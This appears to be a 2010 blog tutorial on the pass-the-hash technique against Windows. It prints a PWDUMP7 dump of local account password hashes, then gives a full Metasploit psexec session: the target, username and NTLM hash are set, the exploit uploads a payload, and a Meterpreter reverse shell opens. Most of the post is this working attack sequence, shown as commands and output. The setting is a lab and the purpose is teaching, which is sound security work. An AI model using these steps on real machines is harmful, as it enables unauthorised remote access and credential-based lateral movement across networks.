Pass the Hash


Get your mind out of the gutter you hippies.  This is an exploitation technique.

So, let’s assume you used one of the previous local exploits and elevated your effective permissions.  If you’re looking to exploit other machines on the network, an old common exploit practice is to dump the local password hashes and run them through John the Ripper, L0phtcrack, or Rainbow Tables to crack the password.  If you can get the password for the local Administrator account on one machine, you can usually use that password to exploit other machines on the network.  Although, if the password is complex enough or LM hashes aren’t even used, it can take a considerable amount of time to actually crack the password, which is where “passing the hash” comes in.

There is an excellent White Paper from SANS that goes much deeper into the subject than I can here.  The gist of the technique is that instead of going through the extensive process of cracking the password, you can simply pass the clear text hash to the remote machine for authentication.  The easiest tool I’ve found to utilize this technique is the PSEXEC module within Metasploit.  Let’s have a quick demonstration.

First, we use PWDUMP7 to dump the local password hashes.  There is also a “hashdump” utility built into Metasploit, but we’re working locally here, so maybe we can cover that later.  Here is the resulting hash dump:

Administrator:500:NO PASSWORD*********************:8846F7EAEE8FB117AD06BDD830B7586C:::
ASPNET:1006:0252CBAB72B4492F13D74481B172E825:B3236BC498A33A3CA9B3D4C8E48D3373:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
HelpAssistant:1000:107ECC6AB4CB35CFF2F678D9BC377703:B45E9E043A3889F9677F14CB7B2F54B9:::
IUSR_BUDLITE:1004:01C2F26EC4009168A67DFDCFBD090BB0:54D4FFC14D3C6460EEFD7A8194033430:::
IWAM_BUDLITE:1005:379388EA83410A09DC58A39F55298A65:6DEAD04C4D643F7FAF3AEAAA16D68D7F:::
SUPPORT_388945a0:1002:NO PASSWORD*********************:A8DAF152C2B78D9724CECC070C06E407:::

Notice that the Administrator has the entry “NO PASSWORD*********************”.  This simply means that the LM hash is not available and we must replace the string with 32 zeros to utilize it.

Next, we fire up Metasploit and configure the password parameter for the PSEXEC module with the hash that we dumped.

msf > search psexec
[*] Searching loaded modules for pattern 'psexec'...

Exploits
========

 Name                   Disclosure Date  Rank       Description
 ----                   ---------------  ----       -----------
 windows/smb/psexec     1999-01-01       manual     Microsoft Windows Authenticated User Code Execution
 windows/smb/smb_relay  2001-03-31       excellent  Microsoft Windows SMB Relay Code Execution

msf > use windows/smb/psexec
msf exploit(psexec) > show options

Module options:

 Name       Current Setting  Required  Description
 ----       ---------------  --------  -----------
 RHOST                       yes       The target address
 RPORT      445              yes       Set the SMB service port
 SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
 SMBPass                     no        The password for the specified username
 SMBUser                     no        The username to authenticate as

Exploit target:

 Id  Name
 --  ----
 0   Automatic

msf exploit(psexec) > set RHOST 192.168.0.201
RHOST => 192.168.0.201
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass 00000000000000000000000000000000:8846F7EAEE8FB117AD06BDD830B7586C
SMBPass => 00000000000000000000000000000000:8846F7EAEE8FB117AD06BDD830B7586C
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.0.147:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.0.201:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \PXmhNDSB.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:[email protected]_np:192.168.0.201[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:[email protected]_np:192.168.0.201[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (vzchEyYr - "MFlhSviwvJVrxoiou")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Sending stage (749056 bytes) to 192.168.0.201
[*] Deleting \PXmhNDSB.exe...
[*] Meterpreter session 1 opened (192.168.0.147:4444 -> 192.168.0.201:1085) at Fri Dec 31 15:57:45 -0500 2010

meterpreter >

And there we have our wonderful Meterpreter session, without even knowing what the actual Administrator password is.  Since this is our first introduction to Metasploit, I have to point you to Metasploit Unleased, which is maintained by the guys at Offensive Security and is an invaluable resource to learn many of the capabilities of the tool.  Check it out!

Comments are closed.